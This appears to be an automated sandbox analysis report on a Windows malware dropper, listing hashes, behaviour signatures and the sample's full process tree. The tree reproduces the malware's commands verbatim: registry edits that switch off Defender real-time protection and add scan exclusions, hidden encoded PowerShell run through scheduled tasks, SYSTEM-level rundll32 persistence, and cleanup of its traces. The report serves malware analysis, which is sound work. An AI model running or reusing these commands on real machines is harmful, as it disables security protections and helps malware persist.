Analysis
-
max time kernel
130s -
max time network
133s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
06-02-2023 17:28
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
3d946d6453cad635dbcb3dc6c012dc55
-
SHA1
8e31f08676c6568af162907f36abc2a8fed6828d
-
SHA256
32f520de1063cb3d641d5dbd53e3b0110bfa885cc6121ba410ca64b1248a8e48
-
SHA512
062e0491375fe95788f027d70bc1e53afc2bb95cd2b772278c0268a405453db940b0ba19da9ba64da073510d1a25737c8e1a9d2be06edefd8c3fd1f716b1ad99
-
SSDEEP
196608:91Od6djzTVjLDbJFmhSN+YyyVlBlfVrhBtcJ1rNIw9Ta35Bn:3Od6L7JFmINflTVNPG1ZIoTe5Z
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 36 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 8 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 9 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSF039.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSF3C2.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFzOxObSs" /SC once /ST 12:21:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFzOxObSs"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFzOxObSs"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "boytPmuAkKgmiEZYSe" /SC once /ST 18:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\xEZriXn.exe\" X6 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\system32\taskeng.exetaskeng.exe {069FDF40-49DA-4A2C-9052-A8400ECFADD6} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {E3D5CBE2-147A-4FED-A60E-7E2235EEBE14} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\xEZriXn.exeC:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\xEZriXn.exe X6 /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxxTLaZrN" /SC once /ST 09:08:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxxTLaZrN"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxxTLaZrN"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFxngLdUk" /SC once /ST 02:23:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFxngLdUk"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFxngLdUk"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\UIFvrSrxAzeYKEuX\AfcMMHDW\LzNItXwhmmUUfkfi.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\UIFvrSrxAzeYKEuX\AfcMMHDW\LzNItXwhmmUUfkfi.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKneYAAzclQU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKneYAAzclQU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eCbNXTSQanJlC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eCbNXTSQanJlC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vcfECUarZbUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vcfECUarZbUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRLQelouU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRLQelouU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WoychCUlhHkYXpVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WoychCUlhHkYXpVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKneYAAzclQU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKneYAAzclQU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eCbNXTSQanJlC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eCbNXTSQanJlC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vcfECUarZbUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vcfECUarZbUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRLQelouU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRLQelouU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WoychCUlhHkYXpVB" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WoychCUlhHkYXpVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkWgzntnB" /SC once /ST 10:03:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Windows security bypass
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkWgzntnB"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkWgzntnB"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tRsUEOedRvIwZoOQu" /SC once /ST 17:52:19 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\cVeHcqU.exe\" nL /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "tRsUEOedRvIwZoOQu"3⤵
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\cVeHcqU.exeC:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\cVeHcqU.exe nL /site_id 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "boytPmuAkKgmiEZYSe"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\wRLQelouU\oBFgOb.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "xhAFLspUEGhlntx" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xhAFLspUEGhlntx2" /F /xml "C:\Program Files (x86)\wRLQelouU\VfPMyAO.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "xhAFLspUEGhlntx"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xhAFLspUEGhlntx"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TGleSCHdxQCUEC" /F /xml "C:\Program Files (x86)\OKneYAAzclQU2\EikJZxF.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iixDycgqswbNt2" /F /xml "C:\ProgramData\WoychCUlhHkYXpVB\IXoUMhY.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PdJioIBoJxlJjfqRR2" /F /xml "C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR\ZuouMLD.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uIlXdWmTwvbWFvFElbK2" /F /xml "C:\Program Files (x86)\eCbNXTSQanJlC\umMpiaO.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jwkhvtMiulvJCTqog" /SC once /ST 03:15:30 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\UIFvrSrxAzeYKEuX\AxMkHWzo\BpVyfYB.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jwkhvtMiulvJCTqog"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "tRsUEOedRvIwZoOQu"3⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UIFvrSrxAzeYKEuX\AxMkHWzo\BpVyfYB.dll",#1 /site_id 5254032⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UIFvrSrxAzeYKEuX\AxMkHWzo\BpVyfYB.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
